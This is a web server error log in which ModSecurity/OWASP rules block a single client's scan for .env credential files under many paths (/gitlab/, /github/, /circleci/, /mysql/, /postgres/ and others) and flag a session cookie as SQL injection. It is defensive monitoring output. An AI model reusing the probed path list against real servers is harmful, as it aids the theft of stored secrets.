[Mon May 11 14:10:33.530501 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/jenkins/.env"] [unique_id "agHHOeJEyNRN152ArORzzAAAAFI"]
[Mon May 11 14:10:33.789719 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gitlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/gitlab/.env"] [unique_id "agHHOeJEyNRN152ArORzzgAAAFI"]
[Mon May 11 14:10:33.790992 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/gitlab/.env"] [unique_id "agHHOeJEyNRN152ArORzzgAAAFI"]
[Mon May 11 14:10:33.791698 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/gitlab/.env"] [unique_id "agHHOeJEyNRN152ArORzzgAAAFI"]
[Mon May 11 14:10:33.792250 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/gitlab/.env"] [unique_id "agHHOeJEyNRN152ArORzzgAAAFI"]
[Mon May 11 14:10:34.061473 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /github/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/github/.env"] [unique_id "agHHOuJEyNRN152ArORzzwAAAFI"]
[Mon May 11 14:10:34.061840 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/github/.env"] [unique_id "agHHOuJEyNRN152ArORzzwAAAFI"]
[Mon May 11 14:10:34.062016 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/github/.env"] [unique_id "agHHOuJEyNRN152ArORzzwAAAFI"]
[Mon May 11 14:10:34.062259 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/github/.env"] [unique_id "agHHOuJEyNRN152ArORzzwAAAFI"]
[Mon May 11 14:10:34.371553 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /actions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/actions/.env"] [unique_id "agHHOuJEyNRN152ArORz0QAAAFI"]
[Mon May 11 14:10:34.371913 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/actions/.env"] [unique_id "agHHOuJEyNRN152ArORz0QAAAFI"]
[Mon May 11 14:10:34.372086 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/actions/.env"] [unique_id "agHHOuJEyNRN152ArORz0QAAAFI"]
[Mon May 11 14:10:34.372326 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/actions/.env"] [unique_id "agHHOuJEyNRN152ArORz0QAAAFI"]
[Mon May 11 14:10:34.621446 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /circleci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/circleci/.env"] [unique_id "agHHOuJEyNRN152ArORz0gAAAFI"]
[Mon May 11 14:10:34.621766 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/circleci/.env"] [unique_id "agHHOuJEyNRN152ArORz0gAAAFI"]
[Mon May 11 14:10:34.621930 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/circleci/.env"] [unique_id "agHHOuJEyNRN152ArORz0gAAAFI"]
[Mon May 11 14:10:34.622152 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/circleci/.env"] [unique_id "agHHOuJEyNRN152ArORz0gAAAFI"]
[Mon May 11 14:10:34.920458 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /travis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/travis/.env"] [unique_id "agHHOuJEyNRN152ArORz0wAAAFI"]
[Mon May 11 14:10:34.920838 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/travis/.env"] [unique_id "agHHOuJEyNRN152ArORz0wAAAFI"]
[Mon May 11 14:10:34.921023 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/travis/.env"] [unique_id "agHHOuJEyNRN152ArORz0wAAAFI"]
[Mon May 11 14:10:34.921300 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/travis/.env"] [unique_id "agHHOuJEyNRN152ArORz0wAAAFI"]
[Mon May 11 14:10:35.062163 2026] [core:error] [pid 1319885:tid 1319930] [client 52.242.216.199:59617] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:35.062191 2026] [core:error] [pid 1319885:tid 1319930] [client 52.242.216.199:59617] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:35.199706 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /buildkite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/buildkite/.env"] [unique_id "agHHO-JEyNRN152ArORz1AAAAFI"]
[Mon May 11 14:10:35.200082 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/buildkite/.env"] [unique_id "agHHO-JEyNRN152ArORz1AAAAFI"]
[Mon May 11 14:10:35.200279 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/buildkite/.env"] [unique_id "agHHO-JEyNRN152ArORz1AAAAFI"]
[Mon May 11 14:10:35.200509 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/buildkite/.env"] [unique_id "agHHO-JEyNRN152ArORz1AAAAFI"]
[Mon May 11 14:10:35.480562 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mysql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mysql/.env"] [unique_id "agHHO-JEyNRN152ArORz1gAAAFI"]
[Mon May 11 14:10:35.480963 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mysql/.env"] [unique_id "agHHO-JEyNRN152ArORz1gAAAFI"]
[Mon May 11 14:10:35.481147 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mysql/.env"] [unique_id "agHHO-JEyNRN152ArORz1gAAAFI"]
[Mon May 11 14:10:35.481431 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mysql/.env"] [unique_id "agHHO-JEyNRN152ArORz1gAAAFI"]
[Mon May 11 14:10:35.745715 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postgres/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/postgres/.env"] [unique_id "agHHO-JEyNRN152ArORz1wAAAFI"]
[Mon May 11 14:10:35.746092 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/postgres/.env"] [unique_id "agHHO-JEyNRN152ArORz1wAAAFI"]
[Mon May 11 14:10:35.746294 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/postgres/.env"] [unique_id "agHHO-JEyNRN152ArORz1wAAAFI"]
[Mon May 11 14:10:35.746530 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/postgres/.env"] [unique_id "agHHO-JEyNRN152ArORz1wAAAFI"]
[Mon May 11 14:10:36.021366 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mongodb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mongodb/.env"] [unique_id "agHHPOJEyNRN152ArORz2AAAAFI"]
[Mon May 11 14:10:36.021750 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mongodb/.env"] [unique_id "agHHPOJEyNRN152ArORz2AAAAFI"]
